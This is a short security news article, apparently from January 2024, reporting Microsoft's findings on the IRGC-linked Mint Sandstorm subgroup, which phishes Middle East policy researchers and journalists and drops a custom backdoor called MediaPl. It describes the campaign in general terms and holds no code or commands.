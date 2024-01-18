Mint Sandstorm, a composite name used to describe several subgroups of activity with ties to the Islamic Revolutionary Guard Corps (IRGC), has been observed using new tactics, techniques, and procedures (TTPs) to target high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the United Kingdom, and the United States, Microsoft said on Wednesday.

Microsoft has been observing this technically and operationally mature subgroup of Mint Sandstorm since November 2023.

The recent Mint Sandstorm campaigns, carried out by a subgroup of Mint Sandstorm, utilized bespoke phishing lures to socially engineer targets into downloading malicious files and in some cases, new post-intrusion tactics were observed, including the use of a custom backdoor named MediaPl. This group targeted journalists, researchers, professors, or other individuals with insights or perspectives on security and policy issues of interest to Tehran.

The group was caught using new tactics, techniques, and procedures (TTPs) including the use of legitimate but compromised email accounts to send phishing lures, the use of the Client for URL (curl) command to connect to the threat group's command-and-control (C2) server and download malicious files, and delivery of MediaPl - a custom backdoor capable of sending encrypted communications to its C2 server.

In some cases, the threat actors used a spoofed email address to mimic a journalist's email account, while in other cases, they used compromised legitimate email accounts belonging to the individuals they aimed to impersonate.

"Operators associated with this subgroup of Mint Sandstorm are patient and highly skilled social engineers whose tradecraft lacks many of the hallmarks that allow users to quickly identify phishing emails. In some instances of this campaign, this subgroup also used legitimate but compromised accounts to send phishing lures. Additionally, Mint Sandstorm continues to improve and modify the tooling used in targets - environments, activity that might help the group persist in a compromised environment and better evade detection," Microsoft wrote in a blog post which also provides detection, hunting, and protection information.